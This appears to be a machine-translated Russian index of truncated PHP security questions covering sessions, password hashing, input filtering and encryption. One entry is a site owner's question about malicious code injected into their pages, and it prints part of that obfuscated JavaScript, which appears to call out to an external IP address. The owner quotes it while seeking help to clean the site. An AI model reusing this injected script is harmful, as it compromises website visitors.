Articles of безопасности

Обновляет ли идентификатор сеанса после успешного входа в систему, чтобы предотвратить фиксацию сеанса?

В настоящее время я читаю руководство , и я немного смущен этим: Чтобы устранить эту слабость, она помогает понять масштаб проблемы. Фиксация сеанса – всего лишь шаг за шагом. Цель атаки – получить идентификатор сеанса, который может использоваться для захвата сеанса. Это наиболее полезно, когда захваченный сеанс имеет более высокий уровень привилегий, чем злоумышленник может […]

Фильтрация входных данных пользователя – нужно ли фильтровать HTML?

Примечание. Я позабочусь о том, чтобы SQL-инъекция и вывод выполнялись в другом месте – этот вопрос касается только фильтрации входных данных, спасибо. Я нахожусь в центре рефакторинга функций фильтрации пользовательских входных данных. Перед передачей параметра GET / POST в фильтр, специфичный для конкретного типа, с помощью filter_var () я делаю следующее: проверьте кодировку параметра с […]

Как хэш-и солевые пароли

Я понимаю, что эта тема иногда воспитывалась, но пока я не совсем уверен в этой теме. Что мне интересно, как вы сольете хэш и работаете с соленым хешем? Если пароль зашифрован с помощью случайной сгенерированной соли, как мы можем проверить его, когда пользователь пытается аутентифицироваться? Нужно ли нам хранить сгенерированный хеш в нашей базе данных? […]

PHP session var достаточно для пользователя auth?

Сценарий: После того, как пользователь вошел в систему, устанавливается переменная сеанса, подтверждающая их логин. В верхней части каждой страницы переменная сеанса входа подтверждена действительной Если это не так, они загружаются. Нет постоянных файлов cookie, только session Вопрос: Является ли это достаточно сильной мерой безопасности самостоятельно или я должен Задайте две переменные сеанса для проверки друг […]

преимущества «HTTP-аутентификации с помощью PHP»

в чем преимущества использования HTTP-аутентификации с PHP (заголовки HTTP 401) вместо обычной проверки подлинности?

Каковы наилучшие методы шифрования паролей, хранящихся в MySql, с использованием PhP?

Я ищу совет о том, как безопасно хранить пароли в MySQL с помощью PHP. Оглядываясь на ограничения самого PHP, я хочу узнать больше о соле, хэшировании и шифровании этих плохих мальчиков. Очевидно, что люди будут продолжать использовать слабые пароли, если не будут вынуждены делать иначе, но именно так я храню их, что важно для меня. […]

Symfony security возвращает 401 ответ вместо перенаправления

Я пишу приложение ajax с ajax-аутентификацией, и теперь я начал использовать компонент безопасности symfony в silex для обработки аутентификации / авторизации. Выполняя простой тест с простой конфигурацией, я перехожу к защищенной зоне с помощью брандмауэра, и ответ, который я получаю, является перенаправлением на страницу /login но то, что мне нужно в моем приложении, – это […]

Выполнение требований пароля

Я хочу проверить, успешно ли пользователь выполнил следующие требования: Пароль имеет не менее 8 символов Состоит из одной столицы и одной строчной буквы Как мне это сделать? Я использую скрипт PHP ниже: if ( strlen( $password ) < 8 ) { false } else { if ( preg_match( "/[^0,9]/", $password ) ) { // how […]

PHP-скрипт: код вредоносного JavaScript в конце

Проблема: На моем веб-пространстве есть файлы PHP, которые заканчиваются следующим: <?php include 'footer.php'; ?> Перед этой строкой в ​​файлах также есть HTML-код. Вывод в браузере заканчивается этим, конечно же: </body> </html> Но вчера, внезапно, появился какой-то вредоносный код. Результатом моего index.php было: </body> </html><body><script> var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;} return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;} return l.value;},j:function(){var l=iiii(ilii('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var […]

Каков наилучший способ реализации двухстороннего шифрования с помощью PHP?

Я хотел бы зашифровать пароли на моем сайте, используя двухстороннее шифрование в PHP. Я столкнулся с библиотекой mcrypt, но она кажется такой громоздкой. Кто-нибудь знает о других методах, которые проще, но еще безопасны? У меня есть доступ к Zend Framework, поэтому решение, использующее его, также будет работать. Мне действительно нужно двухстороннее шифрование, потому что мой […]